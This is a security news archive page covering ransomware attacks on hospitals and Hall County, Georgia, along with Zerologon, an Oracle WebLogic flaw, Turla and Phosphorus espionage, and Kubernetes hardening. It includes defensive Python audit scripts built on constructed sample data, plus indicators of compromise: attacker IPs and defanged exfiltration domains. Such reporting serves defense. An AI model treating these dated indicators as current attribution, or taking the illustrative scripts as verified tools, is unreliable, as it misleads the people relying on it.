Category Archives: Malware

Halloween News Wrap: The Election, Hospital Deaths and Other Scary Cyberattack Stories

Threatpost breaks down the scariest stories of the week ended Oct. 30 haunting the security industry -- including bugs that just won't die.

5 Components of the Kubernetes Control Plane that Demand Special Attention in Your Security Strategy

Organizations are no strangers to security incidents in their Kubernetes environments. These are five key components of the control plane that demand special attention in your security strategy.

Organizations are no strangers to security incidents in their Kubernetes environments. In its State of Container and Kubernetes Security Fall 2020 survey, StackRox found that 90% of respondents had suffered a security incident in their Kubernetes deployments in the last year. Two-thirds of respondents explained that they had weathered a misconfiguration incident, followed by vulnerability cases, runtime events and failed audits at 22%, 17% and 16%, respectively.

Misconfiguration incidents are so common because they can appear in many different aspects of an organization’s Kubernetes environment. For instance, they can affect the Kubernetes control plane. As the Kubernetes documentation notes, this part of a Kubernetes deployment is responsible for making global decisions about a cluster as well as for detecting and responding to events affecting the cluster.

This raises an important question: how can organizations harden the Kubernetes control plane against digital attacks?

To answer that question, this blog post will discuss five components within the Kubernetes control plane that require special attention within organizations’ security strategy. These are the kube-apiserver, etcd, kube-scheduler, kube-controller-manager and cloud-controller-manager. It will then provide recommendations on how organizations can secure each of these components.

kube-apiserver

What it is

Per Kubernetes’ documentation, kube-apiserver is the front end for the Kubernetes control plane. It functions as the main implementation of a Kubernetes API server. Organizations can scale kube-apiserver horizontally by deploying more instances.

Why it needs to be secured

The Container Journal noted that attackers continuously scan the web for publicly accessible API servers. Acknowledging that reality, organizations need to make sure they don’t leave their kube-apiserver instances publicly exposed. If they do, they could give attackers an opening to compromise a Kubernetes cluster.

How to secure it

Administrators can follow the Container Journal’s advice by configuring their API servers to allow cluster API access only via the internal network or a corporate VPN. Once they’ve implemented that measure, they can use RBAC authorization to further limit who has access to the cluster; this authorization mode is enabled on the kube-apiserver itself.

etcd

What it is

Kubernetes uses etcd as the key-value backing store for cluster data. Because this store holds highly sensitive configuration data, organizations that use etcd need a backup plan for the data they want to protect with it.

Why it needs to be secured

As with kube-apiserver, organizations might accidentally leave etcd exposed to the Internet. The New Stack covered the work of one software developer who conducted a search on Shodan to look for exposed etcd servers. This investigation uncovered 2,284 etcd servers that malicious actors could access through the Internet.

How to secure it

Kubernetes notes in its cluster administration resources that access to etcd is equivalent to root permission in the cluster. Accordingly, administrators should grant access only to the nodes that require it. They should also use firewall rules as well as etcd’s built-in security features, notably peer.key/peer.cert and client.key/client.cert, to secure communications between etcd members and between etcd and its clients.

kube-scheduler

What it is

The kube-scheduler is a control plane component that watches for newly created pods with no assigned node and selects a node for each of them to run on. It makes these decisions by taking individual and collective resource requirements, data locality and other constraints into account, per Kubernetes’ website.

Why it needs to be secured

Any compromise of the kube-scheduler could affect the performance and availability of a cluster’s pods, explains Packt. Such an event could thereby cause disruptions in an organization’s Kubernetes environment that undermine business productivity.

How to secure it

Administrators can follow Packt’s advice to secure the kube-scheduler by disabling profiling, a feature which exposes system details. They can do this by setting the “--profiling” flag to “false”. Additionally, they can disable external connections to kube-scheduler using the “AllowExtTrafficLocalEndpoints” configuration to prevent outside attackers from gaining access to this control plane component.

kube-controller-manager

What it is

This component lives up to its name in that it runs controller processes. Logically, each controller, including the node controller, the replication controller and others, is a separate process. However, the kube-controller-manager compiles all of those controllers together and runs them as one process.

Why it needs to be secured

A security issue in the kube-controller-manager could negatively affect the scalability and resilience of the applications running in the cluster, and thus the organization’s business.

How to secure it

Organizations can secure the kube-controller-manager by monitoring the number of instances of this component deployed in their environments. They can also follow the recommendations that StackRox made in September 2020: restricting the component’s file permissions, configuring it to serve HTTPS only, binding it to a localhost interface and using Kubernetes RBAC to grant access to an individual service account per controller.

cloud-controller-manager

What it is

Last but not least, the cloud-controller-manager lets administrators link their cluster to their Cloud Service Provider’s (CSP’s) API. It separates the elements that interact with the CSP’s cloud platform from those that interact only with the cluster. Per Kubernetes’ documentation, cloud-controller-manager functions similarly to kube-controller-manager in combining multiple controllers into one process. The difference is that the cloud-controller-manager runs only the controllers that are specific to an organization’s CSP.

Why it needs to be secured

Issues involving the cloud-controller-manager pose a similar threat to organizations as those that affect the kube-controller-manager.

How to secure it

Acknowledging the similarities between kube-controller-managers and cloud-controller-managers, organizations can use the same measures to secure both.
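As an added example (not code from the original post, from StackRox or from the Kubernetes project), the following Python script audits the command lines of the control plane components discussed above against the hardening points made in this post: RBAC on kube-apiserver, peer and client certificates on etcd, profiling disabled on kube-scheduler, and kube-controller-manager (and, per the section above, cloud-controller-manager) bound to localhost with a service account per controller. The flag names are the components’ real command-line flags; for kube-scheduler the “disable external connections” point is checked via --bind-address, the flag that controls which interface the scheduler listens on. The command lines being audited are constructed samples; in a real cluster they would be read from the static pod manifests under /etc/kubernetes/manifests.

```python
"""Audit Kubernetes control-plane command lines for the hardening settings
discussed in this post (stdlib only). The sample command lines at the bottom
are constructed for illustration, not taken from a real cluster."""
from typing import Callable, Dict, List, Tuple

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# A check is (flag name without the leading dashes, predicate on its value,
# advice to print when the predicate fails or the flag is absent).
Check = Tuple[str, Callable[[str], bool], str]


def _includes_rbac(value: str) -> bool:
    return "RBAC" in value.split(",")


CHECKS: Dict[str, List[Check]] = {
    "kube-apiserver": [
        ("authorization-mode", _includes_rbac,
         "enable RBAC so cluster access can be limited per subject"),
    ],
    "etcd": [
        ("peer-cert-file", lambda v: v != "", "configure peer.cert for member-to-member TLS"),
        ("peer-key-file", lambda v: v != "", "configure peer.key for member-to-member TLS"),
        ("cert-file", lambda v: v != "", "configure client.cert for client TLS"),
        ("key-file", lambda v: v != "", "configure client.key for client TLS"),
        ("client-cert-auth", lambda v: v.lower() == "true", "require client certificates"),
        ("peer-client-cert-auth", lambda v: v.lower() == "true", "require peer certificates"),
    ],
    "kube-scheduler": [
        ("profiling", lambda v: v.lower() == "false", "disable profiling, which exposes system details"),
        ("bind-address", lambda v: v in LOOPBACK, "listen on the localhost interface only"),
    ],
    "kube-controller-manager": [
        ("profiling", lambda v: v.lower() == "false", "disable profiling, which exposes system details"),
        ("bind-address", lambda v: v in LOOPBACK, "listen on the localhost interface only"),
        ("use-service-account-credentials", lambda v: v.lower() == "true",
         "run each controller under its own RBAC-scoped service account"),
    ],
}
# The post recommends the same measures for cloud-controller-manager.
CHECKS["cloud-controller-manager"] = CHECKS["kube-controller-manager"]


def parse_flags(command: List[str]) -> Dict[str, str]:
    """Extract --name=value, --name value and bare --name flags from a command
    list, the shape of `command:` in a static pod manifest."""
    flags: Dict[str, str] = {}
    i = 1  # command[0] is the binary name
    while i < len(command):
        token = command[i]
        if token.startswith("--"):
            name, has_eq, value = token[2:].partition("=")
            if has_eq:
                flags[name] = value
            elif i + 1 < len(command) and not command[i + 1].startswith("--"):
                flags[name] = command[i + 1]
                i += 1
            else:
                flags[name] = "true"  # bare boolean flag
        i += 1
    return flags


def audit(component: str, command: List[str]) -> List[str]:
    """Return one finding per failed check. An absent flag is a finding too,
    because for every flag checked here the default is the insecure value."""
    flags = parse_flags(command)
    findings: List[str] = []
    for flag, is_ok, advice in CHECKS[component]:
        value = flags.get(flag)
        if value is None:
            findings.append(f"{component}: --{flag} not set; {advice}")
        elif not is_ok(value):
            findings.append(f"{component}: --{flag}={value}; {advice}")
    return findings


# Constructed samples: (component, command line as it would appear in the manifest).
SAMPLES: Dict[str, Tuple[str, List[str]]] = {
    "weak-scheduler": ("kube-scheduler", [
        "kube-scheduler", "--kubeconfig=/etc/kubernetes/scheduler.conf",
        "--leader-elect=true"]),
    "hardened-scheduler": ("kube-scheduler", [
        "kube-scheduler", "--kubeconfig=/etc/kubernetes/scheduler.conf",
        "--leader-elect=true", "--profiling=false", "--bind-address=127.0.0.1"]),
    "weak-controller-manager": ("kube-controller-manager", [
        "kube-controller-manager", "--bind-address", "0.0.0.0", "--profiling=true"]),
    "weak-etcd": ("etcd", [
        "etcd", "--cert-file=/etc/kubernetes/pki/etcd/server.crt",
        "--key-file=/etc/kubernetes/pki/etcd/server.key"]),
    "apiserver-with-rbac": ("kube-apiserver", [
        "kube-apiserver", "--authorization-mode=Node,RBAC"]),
}


def audit_samples() -> Dict[str, List[str]]:
    return {name: audit(comp, cmd) for name, (comp, cmd) in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in audit_samples().items():
        print(f"{name}: {'OK' if not findings else str(len(findings)) + ' finding(s)'}")
        for finding in findings:
            print("  -", finding)
```

Absent flags are reported as findings on purpose: for every flag checked here the default is the weak setting (profiling on, listening on all interfaces, no client certificate requirement, no RBAC), so a manifest that simply omits the flag is as exposed as one that sets it wrongly.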

The Security Work Doesn’t End There

The five control plane components discussed above all demand attention as part of an organization’s overall Kubernetes security efforts. Even so, organizations’ work to secure their Kubernetes architecture doesn’t end there. There are also the Node components.

For information on how to secure that part of a Kubernetes cluster, click here.

About the Author: David Bisson is an information security writer and security junkie. He’s a contributing editor to IBM’s Security Intelligence, Tripwire’s The State of Security Blog, and a contributing writer to Bora. He also regularly produces written content for Zix and a number of other companies in the digital security space.

Pierluigi Paganini

(SecurityAffairs – hacking, Kubernetes)

The post 5 Components of the Kubernetes Control Plane that Demand Special Attention in Your Security Strategy appeared first on Security Affairs.

DoppelPaymer ransomware gang leaked Hall County, Georgia, voter info

The DoppelPaymer ransomware operators have released data that was stolen from Hall County, Georgia earlier this month.

The DoppelPaymer ransomware operators have published online data that was stolen from Hall County, Georgia earlier this month.

The attack took place on October 7; it hit Hall County, in the northern part of the state, and disabled the county’s voter signature database.

The ransomware attack hit a Georgia county government and disabled a database used to verify voter signatures when authenticating absentee ballots. Analyzing signatures is a common process for validating absentee ballots sent by mail.

The media pointed out that this is the first reported case of a ransomware attack against a system used in the upcoming 2020 Presidential election.

Ransomware attacks could have a dramatic impact on the elections: they could disrupt voting systems and raise doubts about the validity of the vote.

While the media reported that the ransomware operators leaked stolen data on their dark web leak site to force the organization to pay the ransom, Hall County stated that there was no indication that the hackers had stolen any unencrypted data before encrypting the systems.

“At this time, there is no evidence to show that citizen or employee data has been compromised. However, citizens and employees are encouraged to take precautionary measures to monitor and protect their personal information,” Hall County stated.

The DoppelPaymer ransomware gang finally published over 1 GB of files stolen from Hall County systems and revealed that 2,464 devices were encrypted during the attack.

[Image: DoppelPaymer ransomware leak site entry for Hall County. Source: Bleeping Computer]

According to Bleeping Computer, the dump includes election documents, lobby comment cards, 911 spreadsheets, and accounting and financial records.

“The election documents reviewed by BleepingComputer contain ballot proofs, poll worker lists, administrative documents, accounting and financial records, and city bulletins.” reported Bleeping Computer. “Also included are voter registration records containing resident’s voter registration ID, full name, address, and assigned ballot, which is, for the most part, public information.”

Most of the leaked information is public, but it can be exploited by threat actors to carry out malicious activities against voters.

Recently the US government revealed that Iran-linked hackers were behind voter intimidation emails that were sent to Democrats in Florida and Alaska that pretended to be from the far-right Proud Boys group.

Pierluigi Paganini

(SecurityAffairs – DoppelPaymer ransomware, Hall County)

The post DoppelPaymer ransomware gang leaked Hall County, Georgia, voter info appeared first on Security Affairs.

Brooklyn & Vermont US hospitals hit by ransomware attacks

Wyckoff Heights Medical Center in Brooklyn and the University of Vermont Health Network are the latest victims of the Ryuk ransomware operators.

Ryuk ransomware operators continue to target the US healthcare industry; the latest victims are the Wyckoff Heights Medical Center in Brooklyn and the University of Vermont Health Network.

The news of the attack comes a few hours after the FBI, the DHS’s Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) issued a joint alert to warn hospitals and healthcare providers of imminent ransomware attacks from Russia.

This security advisory describes the tactics, techniques, and procedures (TTPs) associated with cyber criminals that could target organizations in the Healthcare and Public Health Sector (HPH) to infect systems with Ryuk ransomware.

The government agencies have received information about imminent attacks: threat actors are using the TrickBot botnet to deliver the infamous ransomware to infected systems.

This week, the systems at Sky Lakes Medical Center in Oregon and St. Lawrence Health System in New York were infected with the Ryuk ransomware. In September, the Ryuk ransomware gang hit Universal Health Services, one of the largest hospital and healthcare services providers, forcing the company to shut down systems at healthcare facilities in the United States. The incident impacted over 200 medical facilities nationwide.

The news of the Ryuk ransomware attack at the Wyckoff hospital was first published by Bleeping Computer, which was informed by an employee of the organization.

Wyckoff Heights Medical Center is a 350-bed teaching hospital located in an ethnically diverse residential neighborhood directly on the border of northern Brooklyn and Western Queens, NY.

Wyckoff Hospital shut down portions of its network as part of the incident response procedure.

At the time of publishing this post, the extent of the incident and its impact on the hospitals’ operations are not known.

The University of Vermont Health Network also disclosed a similar cyber attack; the organization is working with the FBI and the Vermont Department of Public Safety on the investigation.

“People who are in urgent need of care are getting it and most appointments are happening,” Dr. Stephen Leffler, president of the University of Vermont Medical Center in Burlington, said at a news conference late Thursday outside the hospital. “Most surgeries will happen tomorrow. We did slow some down today as were switching systems.”

The attack has had varying impacts on each of the network’s affiliates; the ransomware family involved in the attack has yet to be revealed.

“The attack has caused variable impacts at each of our affiliates. Staff are continuing to follow well-practiced standby procedures to ensure safe patient care. We understand the difficulty this causes for our patients and the community and apologize for the impact. There have been some changes to patient appointments and we are attempting to reach those patients who have been affected. We will continue to provide systems and patient service updates when they are available,” read a statement from the University of Vermont Health Network.

According to researchers at Check Point, healthcare was the industry most targeted by ransomware in the US in October. Ransomware attacks against the US healthcare sector increased by 71%; the experts also reported increases of 33% in APAC and 36% in EMEA.

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post Brooklyn & Vermont US hospitals hit by ransomware attacks appeared first on Security Affairs.

Threat actors are actively exploiting Zerologon flaw, Microsoft warns

Microsoft researchers are warning that threat actors are continuing to actively exploit the ZeroLogon vulnerability in attacks in the wild.

Microsoft is warning that threat actors are actively exploiting the ZeroLogon vulnerability in the Netlogon Remote Protocol.

The CVE-2020-1472 flaw is an elevation-of-privilege vulnerability in the Netlogon Remote Protocol. The Netlogon service is an authentication mechanism used in the Windows Client Authentication Architecture; it verifies logon requests and registers, authenticates, and locates domain controllers.

An attacker could exploit the vulnerability to impersonate any computer, including the domain controller itself, and execute remote procedure calls on its behalf.

An attacker could also exploit the flaw to disable security features in the Netlogon authentication process and change a computer’s password on the domain controller’s Active Directory.

“Microsoft has received a small number of reports from customers and others about continued activity exploiting a vulnerability affecting the Netlogon protocol (CVE-2020-1472) which was previously addressed in security updates starting on August 11, 2020.” reads a post published by MSRC VP of Engineering Aanchal Gupta. “If the original guidance is not applied, the vulnerability could allow an attacker to spoof a domain controller account that could be used to steal domain credentials and take over the domain.”

Microsoft strongly encourages administrators of enterprise Windows Servers to install the August 2020 Patch Tuesday updates as soon as possible to protect their systems from Zerologon attacks exploiting CVE-2020-1472.

Because the initial documentation regarding the Zerologon patching process was not clear enough, Microsoft provided the following updated guidance:

  1. UPDATE your Domain Controllers with an update released August 11, 2020 or later.
  2. FIND which devices are making vulnerable connections by monitoring event logs.
  3. ADDRESS non-compliant devices making vulnerable connections.
  4. ENABLE enforcement mode to address CVE-2020-1472 in your environment.
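Steps 2 and 3 above rely on the Netlogon events that the August 2020 update writes to the System log on patched domain controllers. As an added example (not code from the original post or from Microsoft), the following Python script groups such events by the account that made the vulnerable connection, so the non-compliant devices can be listed and fixed before enforcement mode is enabled. The event IDs are the ones Microsoft documents for the update: 5827 and 5828 for denied vulnerable connections from machine and trust accounts, 5829 for a vulnerable connection that was allowed during the deployment phase, and 5830 and 5831 for connections allowed by group policy. The events themselves are constructed samples, and the field names used for them (id, dc, account, ip, os) are assumptions rather than the exact property names of the Windows events; in practice the input would be exported from a domain controller, for instance with Get-WinEvent filtered to those IDs.

```python
"""Triage the Netlogon events added by the August 2020 update (Zerologon
guidance, steps FIND and ADDRESS). Event IDs are the ones Microsoft documents;
the sample events and their field names are constructed for this example."""
from collections import defaultdict
from typing import Dict, List

# Vulnerable Netlogon secure channel connection events logged on a patched DC.
DENIED = {5827: "denied (machine account)", 5828: "denied (trust account)"}
ALLOWED_DEPLOYMENT = {5829: "allowed during deployment phase"}
ALLOWED_BY_POLICY = {5830: "allowed by group policy (machine account)",
                     5831: "allowed by group policy (trust account)"}
NETLOGON_IDS = {**DENIED, **ALLOWED_DEPLOYMENT, **ALLOWED_BY_POLICY}

# Constructed sample events (not real log data; field names are assumptions,
# not the exact property names of the Windows events).
SAMPLE_EVENTS: List[dict] = [
    {"id": 5829, "dc": "DC01", "account": "OLDPRINT01$", "ip": "10.10.5.20", "os": "Windows 7"},
    {"id": 5829, "dc": "DC01", "account": "OLDPRINT01$", "ip": "10.10.5.20", "os": "Windows 7"},
    {"id": 5829, "dc": "DC02", "account": "NAS01$", "ip": "10.10.9.4", "os": "Samba"},
    {"id": 5830, "dc": "DC01", "account": "LEGACYAPP$", "ip": "10.10.7.7", "os": "Windows Server 2008"},
    {"id": 5827, "dc": "DC01", "account": "UNKNOWN01$", "ip": "10.10.3.9", "os": "unknown"},
    {"id": 4624, "dc": "DC01", "account": "alice", "ip": "10.10.1.2", "os": "Windows 10"},  # unrelated logon
]


def group_vulnerable_connections(events: List[dict]) -> Dict[str, dict]:
    """Per account: count of each Netlogon event ID plus the DCs, source IPs
    and OS strings seen, so each device can be traced and remediated."""
    summary: Dict[str, dict] = defaultdict(
        lambda: {"counts": defaultdict(int), "dcs": set(), "ips": set(), "os": set()})
    for e in events:
        if e["id"] not in NETLOGON_IDS:
            continue  # not one of the vulnerable-connection events
        entry = summary[e["account"]]
        entry["counts"][e["id"]] += 1
        entry["dcs"].add(e["dc"])
        entry["ips"].add(e["ip"])
        entry["os"].add(e["os"])
    return dict(summary)


def noncompliant_devices(events: List[dict]) -> List[str]:
    """Accounts whose vulnerable connections are still being allowed (5829).
    These must be patched, replaced or explicitly excepted via policy before
    enforcement mode is enabled, because enforcement will start denying them."""
    summary = group_vulnerable_connections(events)
    return sorted(acct for acct, s in summary.items() if s["counts"].get(5829, 0) > 0)


def ready_for_enforcement(events: List[dict]) -> bool:
    """True when no 5829 events remain: every vulnerable connection is either
    already denied (5827/5828) or knowingly allowed by policy (5830/5831)."""
    return not noncompliant_devices(events)


def report(events: List[dict]) -> List[str]:
    """Human-readable summary, one line per account plus a verdict line."""
    lines = []
    for acct, s in sorted(group_vulnerable_connections(events).items()):
        ids = ", ".join(f"{eid} x{n} ({NETLOGON_IDS[eid]})" for eid, n in sorted(s["counts"].items()))
        lines.append(f"{acct}: {ids}; DCs={sorted(s['dcs'])} IPs={sorted(s['ips'])} OS={sorted(s['os'])}")
    lines.append("ready for enforcement mode: " + ("yes" if ready_for_enforcement(events) else "no"))
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_EVENTS)))
```

The distinction the script draws is the one that matters for step 4: 5827/5828 show the patch already rejecting a vulnerable connection, 5830/5831 show an exception an administrator deliberately configured, while 5829 marks a device that still depends on the vulnerable behaviour and will break, or remain exposed, once enforcement is turned on.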

At the end of September, Microsoft issued a similar warning. The IT giant published a series of tweets to warn that attackers were actively exploiting the Windows Server Zerologon flaw in the wild, and urged Windows administrators to install the released security updates as soon as possible.

In early October, Microsoft spotted a series of Zerologon attacks allegedly launched by the Russian cybercrime group tracked as TA505, CHIMBORAZO and Evil Corp.

Microsoft experts spotted Zerologon attacks involving fake software updates; the researchers noticed that the malicious code connected to command and control (C&C) infrastructure known to be associated with TA505.

In the same period, Microsoft published a post and a series of tweets to warn of cyber attacks exploiting the Zerologon vulnerability carried out by the Iran-linked APT group known as MuddyWater, aka Mercury.

On September 18, the Department of Homeland Security’s CISA issued an emergency directive ordering government agencies to address the Zerologon vulnerability (CVE-2020-1472) by September 21.

Pierluigi Paganini

(SecurityAffairs – hacking, Windows)

The post Threat actors are actively exploiting Zerologon flaw, Microsoft warns appeared first on Security Affairs.

US hospitals warned of threat of imminent ransomware attack

US hospitals and healthcare providers have been warned that there is evidence of a credible and imminent threat that they will be targeted by ransomware. In an alert jointly released by the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS), the agencies reveal that they have "credible information of an increased and imminent cybercrime threat to US hospitals and healthcare providers." Read more in my article on the Bitdefender Business Insights blog.

US Cyber Command details implants used in attacks on parliaments and embassies

US Cyber Command published technical details on malware implants used by Russia-linked APTs on multiple parliaments, embassies

US Cyber Command shared technical details about malware implants employed by Russian hacking groups in attacks against multiple ministries of foreign affairs, national parliaments, and embassies.

Experts from the US Cyber Command’s Cyber National Mission Force (CNMF) unit and the Cybersecurity and Infrastructure Security Agency (CISA) uploaded the samples to the VirusTotal online scanning platform.

CISA also published two joint advisories with the FBI and CNMF that provide information on the ComRAT and Zebrocy malware used by Russia-linked APT groups, including APT28 and Turla.

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, NASA and the US Central Command.

“FBI has high-confidence that Russian-sponsored APT actor Turla, which is an espionage group active for at least a decade, is using ComRAT malware to exploit victim networks. The group is well known for its custom tools and targeted operations.” reads the advisory published by CISA.

Russia-linked cyberespionage groups utilized the Zebrocy backdoor in attacks aimed at embassies and ministries of foreign affairs from Eastern Europe and Central Asia.

“Two Windows executables identified as a new variant of the Zebrocy backdoor were submitted for analysis. The file is designed to allow a remote operator to perform various functions on the compromised system.” reads the CISA’s advisory.

Zebrocy is known to be part of APT28’s arsenal; APT28 is a Russia-linked APT group working under the control of the Russian Main Intelligence Directorate (GRU).

Pierluigi Paganini

(SecurityAffairs – hacking, US Cyber Command)

The post US Cyber Command details implants used in attacks on parliaments and embassies appeared first on Security Affairs.

FBI, CISA alert warns of imminent ransomware attacks on healthcare sector

FBI and the DHS’s CISA agencies published a joint alert to warn hospitals and healthcare providers of imminent ransomware attacks from Russia.

The FBI, the DHS’s Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) have issued a joint alert to warn hospitals and healthcare providers of imminent ransomware attacks from Russia.

This security advisory describes the tactics, techniques, and procedures (TTPs) associated with cyber criminals that could target organizations in the Healthcare and Public Health Sector (HPH) to infect systems with Ryuk ransomware.

The government agencies have received information about imminent attacks: threat actors are using the TrickBot botnet to deliver the infamous ransomware to infected systems.

“CISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.” reads the alert.

TrickBot is a popular banking Trojan that has been around since October 2016; its authors have continuously upgraded it with new features.

[Image: Ryuk ransomware]

In early 2019, researchers spotted a new TrickBot backdoor framework dubbed Anchor that was using the anchor_dns tool for abusing the DNS protocol for C2 communications.

Several groups of experts have linked both TrickBot and Ryuk to cybercrime gangs operating out of Russia. Ryuk first appeared in the threat landscape in August 2018 as a derivative of the Hermes 2.1 ransomware, which was first spotted in late 2017 and was available for sale on the open market as of August 2018.

Unlike other ransomware gangs, the Ryuk ransomware operators did not announce that they would avoid targeting healthcare organizations during COVID-19.

A few weeks ago, Universal Health Services (UHS), one of the largest hospital and healthcare services providers, shut down systems at healthcare facilities in the United States after they were infected with the Ryuk ransomware.

A few days ago, Microsoft’s Defender team, FS-ISAC, ESET, Lumen’s Black Lotus Labs, NTT, and Broadcom’s cyber-security division Symantec joined forces and announced a coordinated effort to take down the command and control infrastructure of the infamous TrickBot botnet.

Microsoft has taken down 120 of the 128 servers that were composing the Trickbot infrastructure.

Microsoft announced that it had taken down 62 of the original 69 TrickBot C&C servers; the seven servers that could not be brought down last week were Internet of Things (IoT) devices.

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post FBI, CISA alert warns of imminent ransomware attacks on healthcare sector appeared first on Security Affairs.

Critical Oracle WebLogic flaw CVE-2020-14882 actively exploited in the wild

Threat actors have started exploiting a critical vulnerability in Oracle WebLogic, tracked as CVE-2020-14882, in attacks in the wild.

Threat actors have started scanning the Internet for servers running vulnerable installs of Oracle WebLogic in an attempt to exploit a critical flaw tracked as CVE-2020-14882.

CVE-2020-14882 can be exploited by unauthenticated attackers to take over the system by sending a simple HTTP GET request.

The vulnerability received a severity rating of 9.8 out of 10 and was addressed by Oracle in this month’s Critical Patch Update (CPU).

The vulnerability affects Oracle WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.

The flaw was discovered by the security researcher Voidfyoo from Chaitin Security Research Lab.

Security researchers from the SANS Technology Institute set up a collection of honeypots that allowed them to catch a series of attacks shortly after exploit code for CVE-2020-14882 was made public.

According to Johannes Ullrich, Dean of Research at SANS, the attacks that targeted the honeypots originated from the following IP addresses:

  • 114.243.211.182 – assigned to China Unicom
  • 139.162.33.228 – assigned to Linode (U.S.A.)
  • 185.225.19.240 – assigned to MivoCloud (Moldova)
  • 84.17.37.239 – assigned to DataCamp Ltd (Hong Kong)

According to the SANS expert, the exploit employed in the attacks appears to be based on the code published in this blog post by the researcher Jang.

“These exploit attempts are right now just verifying if the system is vulnerable. Our honeypots (up to now) do not return the “correct” response, and we have not seen follow-up requests yet.” reads the post published by SANS.

SANS Institute is alerting the internet service providers operating the IP addresses involved in the attacks.

The exploit used by the attackers only probes the systems to determine whether they are vulnerable.

Searching the Spyse engine for Oracle WebLogic servers exposed online and potentially vulnerable to CVE-2020-14882 returns more than 3,000 installs.

Administrators of Oracle WebLogic installs have to apply the patch for the CVE-2020-14882 vulnerability as soon as possible.

Pierluigi Paganini

(SecurityAffairs – hacking, Oracle WebLogic)

The post Critical Oracle WebLogic flaw CVE-2020-14882 actively exploited in the wild appeared first on Security Affairs.

Russia-linked Turla APT hacked European government organization

Russia-linked APT Turla has hacked into the systems of an undisclosed European government organization according to Accenture.

According to a report published by Accenture Cyber Threat Intelligence (ACTI), Russia-linked cyber-espionage group Turla has hacked into the systems of an undisclosed European government organization.

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

The attack against the undisclosed European government organization is in line with the APT’s espionage motivation. The attackers utilized a combination of remote procedure call (RPC)-based backdoors, such as HyperStack, and remote administration trojans (RATs), such as Kazuar and Carbon. ACTI researchers observed the attacks between June and October 2020.

“Notably, Accenture researchers recently identified novel command and control (C&C) configurations for Turla’s Carbon and Kazuar backdoors on the same victim network.” reads the report published by Accenture. “The Kazuar instances varied in configuration between using external C&C nodes off the victim network and internal nodes on the affected network, and the Carbon instance had been updated to include a Pastebin project to receive encrypted tasks alongside its traditional HTTP C&C infrastructure.”

HyperStack, first observed in 2018, is one of several RPC backdoors in Turla’s arsenal; it is a custom implant developed by the APT group.

HyperStack leverages named pipes to execute remote procedure calls (RPC) from the command and control server to the device running the HyperStack client. Lateral movement is implemented by attempting to connect to another remote device’s IPC$ share, either using a null session or default credentials.

“IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from. If the implant’s connection to the IPC$ is successful, the implant can forward RPC commands from the controller to the remote device, and likely has the capability to copy itself onto the remote device.” continues the report.

Turla uses a variety of command and control (C&C) implementations for each compromise in an attempt to be resilient to countermeasures implemented by defenders. The Russia-linked APT group has relied on both compromised web servers and legitimate web services like Pastebin as C&C. One of the Kazuar samples analyzed by the experts was configured to receive commands sent through likely internal nodes in the government’s network.

Turla continues to extensively use the modular Carbon backdoor framework with advanced peer-to-peer capability. One of the Carbon backdoors analyzed by the researchers used traditional threat actor-owned C&C infrastructure with tasks served from Pastebin. ACTI analysts discovered a Carbon installer that dropped a Carbon Orchestrator, two communication modules, and an encrypted configuration file.

ACTI also shared Indicators of Compromise (IoCs) for this attack to allow government entities to check for evidence of compromise within their networks.

“Turla will likely continue to use its legacy tools, albeit with upgrades, to compromise and maintain long-term access to its victims because these tools have proven successful against Windows-based networks,” concludes Accenture.

Pierluigi Paganini

(SecurityAffairs – hacking, Turla)

The post Russia-linked Turla APT hacked European government organization appeared first on Security Affairs.

Iran-linked Phosphorous APT hacked emails of security conference attendees

Iran-linked APT group Phosphorus successfully hacked into the email accounts of multiple high-profile individuals and security conference attendees.

Microsoft revealed that Iran-linked APT Phosphorus (aka APT35, Charming Kitten, Newscaster, and Ajax Security Team) successfully hacked into the email accounts of multiple high-profile individuals and attendees at this year’s Munich Security Conference and the Think 20 (T20) summit.

“Today, we’re sharing that we have detected and worked to stop a series of cyberattacks from the threat actor Phosphorous masquerading as conference organizers to target more than 100 high-profile individuals.” reads the post published by Microsoft. “Phosphorus, an Iranian actor, has targeted with this scheme potential attendees of the upcoming Munich Security Conference and the Think 20 (T20) Summit in Saudi Arabia.”

Nation-state actors successfully targeted over 100 individuals, including former ambassadors and other senior policy experts.

According to the experts at the Microsoft Security Intelligence Center, the attacks are part of a cyber-espionage campaign aimed at gathering intelligence on the victims by exfiltrating data from their mailboxes and contact lists.

Data was exfiltrated to the de-ma[.]online domain, and the g20saudi.000webhostapp[.]com, and ksat20.000webhostapp[.]com subdomains.

The attackers have been sending spoofed email invitations to former government officials, policy experts, academics, and leaders from non-governmental organizations. Attackers attempted to exploit fears of travel during the Covid-19 pandemic by offering remote sessions.

The emails were written in almost perfect English.

Experts believe that this campaign is not tied to the upcoming U.S. Presidential elections.

Microsoft experts have worked with conference organizers, who are warning their attendees about the ongoing attacks and advising them to remain vigilant about this approach being used in connection with other conferences or events.

“We recommend people evaluate the authenticity of emails they receive about major conferences by ensuring that the sender address looks legitimate and that any embedded links redirect to the official conference domain. As always, enabling multi-factor authentication across both business and personal email accounts will successfully thwart most credential harvesting attacks like these.” suggests Microsoft. “For anyone who suspects they may have been a victim of this campaign, we also encourage a close review of email-forwarding rules in accounts to identify and remove any suspicious rules that may have been set during a successful compromise.”

